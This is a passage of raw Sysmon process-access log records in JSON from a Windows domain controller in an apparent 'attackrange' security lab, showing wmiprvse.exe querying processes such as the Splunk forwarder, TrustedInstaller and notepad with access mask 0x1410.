Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5827,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-2001-5F25-0000-0010C9D80500}\r\nTargetProcessId: 4596\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-2001-5F25-0000-0010C9D80500}","TargetProcessId":"4596","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5828,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-00105D520800}\r\nTargetProcessId: 3592\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-00105D520800}","TargetProcessId":"3592","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5829,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-00101E540800}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-00101E540800}","TargetProcessId":"4976","TargetImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5830,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-00107FD70800}\r\nTargetProcessId: 4508\r\nTargetImage: C:\\Windows\\system32\\notepad.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-00107FD70800}","TargetProcessId":"4508","TargetImage":"C:\\Windows\\system32\\notepad.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5831,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-0010CDDD0800}\r\nTargetProcessId: 4620\r\nTargetImage: C:\\Windows\\system32\\notepad.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-0010CDDD0800}","TargetProcessId":"4620","TargetImage":"C:\\Windows\\system32\\notepad.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5832,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-0010DBE10800}\r\nTargetProcessId: 2124\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-0010DBE10800}","TargetProcessId":"2124","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5833,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-00105BE20800}\r\nTargetProcessId: 1592\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCR